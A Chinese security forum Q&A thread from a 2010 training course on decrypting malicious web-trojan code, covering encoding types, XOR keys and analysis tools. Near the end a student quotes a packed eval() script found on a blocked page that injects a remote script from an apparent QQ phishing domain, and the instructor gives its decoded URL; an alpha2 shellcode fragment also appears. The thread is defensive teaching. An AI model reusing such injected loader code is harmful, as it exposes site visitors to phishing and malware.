瑞星卡卡安全论坛

讲师：networkedition

讲义地址：http://bbs.ikaka.com/showtopic-8645169.aspx
                 
                http://bbs.ikaka.com/showtopic-8646107.aspx

本次课程答疑时间：2010年7月15日 14:00-16:00

答疑形式：提问者看过讲义后可先发表问题咨询，讲师在答疑时间内会将答复直接回复在提问者的问题所在楼层内.

提问方式：回复本帖提问（即跟帖），不要通过QQ群提问！

1.在网马解密实际的训练中，发现很多网马都不会解密，对于我们没见过的网马要怎么处理？（个人感觉方法很重要）。
2.还有就是CSS那种，怎么知道那个是网马呢？
3.中了网马一般会释放到系统哪些目录呢？能具体的说一下吗？
4.还有就是猜解密匙方面，主要是靠经验吗？老师能不能分享一些经验？一些网站有自动解密的程序，这个又是怎么实现的呢？

额 问题好多，都不知道怎么提问了，其实自己最不放心的就是网马解密，网马涉及到shellcode溢出和脚本语言之间，有点困难。

有点困了 暂时就想到了这些，下午醒了再想想。

★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为 networkedition回复：


1.不会解密多看教程呀，教程涵盖了大多数的国内目前网马解密的方法。可以多看看恶意网站交流区的教程。遇到不会解密的在这个区发帖或恶意网址交流区发帖提问都行。


2. 正常的css是网页制作中的层叠样式表文件，如何来判断是网马，可以直接查看其源代码，下图就为一个css网马，实际上就是exe程序，将css修改为exe后即可运行。

 附件: 您所在的用户组无法下载或查看附件
3.如果中招了可以根据日志来分析呀，刚好来练手。


4. 关于密钥问题基本就是靠经验来分析，翻来覆去的就是那几个密钥：bd、c2等等吧，观察shellcode里面那个已知的密钥多，基本上就是那个。自动解密程序是内置了相应的算法吧，但不是所有的shellcode都可以通过自动解密解出，工具不是万能的。

最后一天的课了，时间好快，已经在瑞星实习10天了，加油！！
第一个哦！！

(*^__^*) 嘻嘻……先占位，等着上课~~

networkedition老师，在查看参考资料的时候，发现一个浏览器攻击。如图：
打开http://bbs.ikaka.com/showtopic-8629150.aspx
这个网页中的：(转帖）给大家找了些基础教程 http://bbs.ikaka.com/showtopic-8625426.aspx

 附件: 您所在的用户组无法下载或查看附件（那个整个的图有些大，传不上来）
这个是防火墙的显示

 附件: 您所在的用户组无法下载或查看附件

这两次攻击都是那个网页，之后所有论坛的网页被屏蔽了，只能关闭防火墙才能打开论坛的网页。

★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★
以下为networkedition回复：
在防火墙里有个设置：网络监控——网络攻击拦截，在右侧有个自动禁止与攻击计算机通讯默认是5分钟，也就是说这5分钟之内你是无法访问网页的，可以将时间修改为最短1分钟。

呵呵，学习学习，准备问问题。觉得今天的课很好玩，但是不知是我没学明白还是其他原因，我怎么觉得那么容易混掉。下面有些问题不太明白，请老师指点。

1。网马之间的区别。我认为其他网马都有可能是大小写数字混排的，怎么区分它是BASE64的？比如alpha2不也是乱七八糟的，如没看到TYTIIIIIIIIIIIII我觉得很像BASE64。是不是主要判断最后有没有=？但是不是也可能没有啊？有没有判断的先后顺序？

★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复：

教程中将各种加密方法的特征都写的很清楚，可以直接对照着来看，符合相应的特征了，那么自然也就知道使用的是什么加密了。教程中总结出来的特征一般情况下都是符合相应的加密特征。

例：以TYTIIIIIIIIIIIII开头的代码肯定就是alpha2加密了，而如果在代码后面有形如==之类的就是base64加密，简单记忆总结出常见网马加密的特征。对于使用哪种解密方法还是很有用处的。

2。还是关于网马之间的区别。下面这个是“document.write解密CSS源代码”

Shell9="b4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoSQTnsSPdQt5a6NRC2OPmfOpmTn1srSt3OpWp";

这个也并没有TYTIIIIIIIIIIIII啊？怎么判断出是alpha2？


★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复：


这个是alpha2加密的一个特例，找RHptd4，他后面就是URL地址（即网马地址）。

3。解winwebmail,时为什么密匙是1233,代码部分，不是document.write(unencode(webmm,3422)),不是应该是3422？还有我把winwebmail又和document.write有点混了，不都是在document.write函数里吗？document.write函数里面有(unencode(webmm,就是winwebmail？不是就是document.write？
如果winwebmail用document.write方式解，即把document.write变为alert，怎么只出个<SCR=
这样子如果真是病毒的话是不是就已经中招了？
★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复：

这是有两种解密方法，第一可以使用freshow的winwebmail来直接进行解密，解密时需要手动添加密钥。密钥应为：3422。第二，可以使用document.write替换为alert方法来进行解密，当遇到一个不会解密网马时，首先可以查找代码中是否有eval或document.write这个两个函数，这样解密起来就容易了。alert方法会出现代码截断现象，如果代码太长，建议使用redoce的documen.write清除来进行解密。

4。用FREshow解网马有危险吗？比如把自认为解好代码放到HTML文件里，但实际没有解出来，会不会就中病毒了？
★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复：

使用freshow工具解密时没有危险，我都解密了成千上万了，系统也没有中毒。至于代码放到html文件里，记住一定要替换相应的函数，否则有可能会将网马触发执行。

5。Winwebmail解密源代码，我一开始处理为

66708666536666966654"//666636665666652667366665366    （剩下省略）

我解出来的就是一大堆乱七八糟的东西，仔细看您的讲义，发现删除了"// ，请问"//是什么？

★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复：

干扰字符吧，有些网马就是这样里面有很多无用的字符，将其替换为空即可。

6。FREshow不能解base64吗？我看它里面也有个base64。
★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复：

是的，这是软件的bug。1.5版本后就在没有更新过这个软件。

7。是不是网马基本就这几种？会不会一段代码中用多种加密方式啊？
★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复：

国内常见的基本上都列出来了，一段代码中有多种加密方式这个是有可能的。具体问题具体分析。

对了，还有就是上届不有一些联系吗？那些还能做吗？网址都还有效吗？
★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复：

由于网马的失效性是很快的，有些可能已经清除了，或者域名已经失效。你可以尝试解密带源代码的练习题。

networkedition老师，您好！辛苦您了！

我这有几个问题向您请教：

1.使用FreShow测试网站，当在URL栏输入网址后，点Check,结果状态显示【DNS Faild】或【Error ID：400】，
不知是怎么回事？

2.在分析一个网站过程中遇到一个网址如：http://*****1.exe,则可判断是网马，那除了.exe后缀外，还有哪种文件后缀可能是网马？

★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复：

1. 出现dns faild或errorid：400等，都是指网址失效了，dnsfaild是指dns解析失败。网站状态专门有个对应表吧。可以百度一下找找。

2.多种形式文件的扩展名都可能是网马，例如：css、txt、mdb等等吧。

networkedition老师，请问如果网马解密中遇到加密的代码，如何得到解密的密钥呢？

★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复：

1. 可以通过猜解的方法得到密钥，这个需要解密的经验。
2. 直接使用OD工具进行调试shellcode，得出密钥。
3. 使用shellcode自动解密工具（此方法不推荐使用）。
4。freshow的enumxor有自动枚举密钥的功能，一般常见的带密钥的shellcode都可以枚举出。

呵呵，问题好像有点多。我觉得解网马挺好玩的。

你好，请问伪装调用挂马是不是又叫网络钓鱼挂马呢？:kaka12:

我想问问networkedition老师网马解密中的网站是从哪里获取的？解密出来的网马是怎么处理的？

谢谢networkedition老师！

★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复：

网址绝大多数来源于瑞星云安全拦截到的数据，解密出的网马对于杀软无法查杀的直接上报入库。如有感兴趣分析病毒样本的，可以自己尝试在虚拟机里运行分析病毒行为。

问题：
1、在winwebmail解密中，为什么要把《"//》去掉呢？
2、老师，这些解密工具似乎对Base64解码的支持并不好（比如说FreShow只能解出一个b的字符，而malzilla也只能解出一行出来），这是为什么呢?
3、如果网马解出来的是一个CSS或js文件，是不是要追踪这些代码才能找到源头呢？还有，网马的源头一般是什么文件（exe或com）？


剩下的想到再问，谢谢老师。
★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复：
1. 干扰字符，有些网马里有很多类似干扰字符，主要用来迷惑或遮人耳目。

2. freshow工具有bug吧，无法解密base64加密。工具不是万能的呀

3. 对于解密出来的网马css或js可以直接下载后查看源代码来判断是否为最终的网马（即病毒样本），如何判断可参看本帖2楼的截图。

好快啊，赶紧来占个座啊。老师辛苦了

networkedition老师好，我想问一下。
我记得以前网页的扩展名是html，而现在保存的网页都是htm格式的，而且也没有那个存储图片等数据的文件夹了，这是什么原因啊？
谢谢老师了

★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复：
这个是正常的吧，也是html和htm的区别所在。要看你保存为什么扩展名了。

老师请问一下！
我们平时查看html的时候，是不能直接在里面修改html的，那我们用网页解密工具preshow查到网码的时候，发现了有攻击的挂马，我们修改完后，可以放回和替换原来网址的html吗？

★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复：

客户端是无法修改服务器端的数据的，网马清除所有操作都是在服务器端，需要网站站长或网站管理员来操作。

老师请问一下！
为什么我在正常的URL后面随便加一些后缀后运行网址，为什么不提示【不存在你输入的网页地址】，而是又跳回原来的地址呢，在html中那块是实现这个功能的。

★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复：

有容错吧，我个人理解是网站有些网站会判断客户端提交的参数（数据），如遇到一些非法的参数会直接跳转到首页，程序会认为客户端提交的参数存在有恶意行为。

老师好，好像听说过一种什么方式，能禁用掉iframe，框架挂马也就没用了？
★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复：

除非你不使用框架吧，iframe是最常见的挂马形式，当然还有其它形式的。

老师我觉得网码解密和日记分析一样都是要靠平时的积累和学习。
想问一下一般网码分析工具在解密的时候也是一行一行的扫描出结果来的，难道一些人在编译挂网的时候不会有什么办法来隐藏自己的挂马吗？
★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复：

编写网马解密工具的人，是针对分析网马的特性来进行编写的，例如：freshow的filter直接可以将网站源代码中的iframe、js等过滤出来，这样就大大降低了人工来看代码，一个一个将链接摘抄出来。当然工具也不是万能的。你说的隐藏代码实际上可以理解为加密，实际上最初的网站代码加密是用来防止其它网站抄袭代码，后来被逐渐引入到了网页挂马。

老师下面的图形中的绿点是表示对应的文档出现问题的地方吗？


 附件: 您所在的用户组无法下载或查看附件

★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复：
这些绿点没有什么意义吧。

今天的看得我一个头两个大啊。。。
:kaka4:
先慢慢琢磨去了。。。

老师那些代码特征码之类的是不是只有在实践中逐渐积累了？
对于我们这些初次接触的人来说有点不知所措了。。。
ToT。。。

学习~ 谢谢老师！
请问讲义中常见网页挂马方式第5点和第11点有没有区别，是相同的么？

在看教程

老师，在浏览网页的时间，我发现一个网页也被拦截，后查看代码，在head和body之间的代码如下：
<Script language="javascript">
<!--
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('b.a(\'<9 8="7://6.5.4/3/0/2.0"></1>\');',12,12,'js|script|dtree|web|com|qqcn2010|www|http|src|SCRIPT|write|document'.split('|'),0,{}))
-->
</Script>
请问下老师这是不是个QQ钓鱼的代码！谢谢老师
★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为 networkedition回复：

不错呀，你都学会找eval加密了。解密出是个js，大概看了一下代码，ms是qq钓鱼弹窗之类的。

http://www.qqcn2010.com/web/js/dtree.js

来上课啦~~~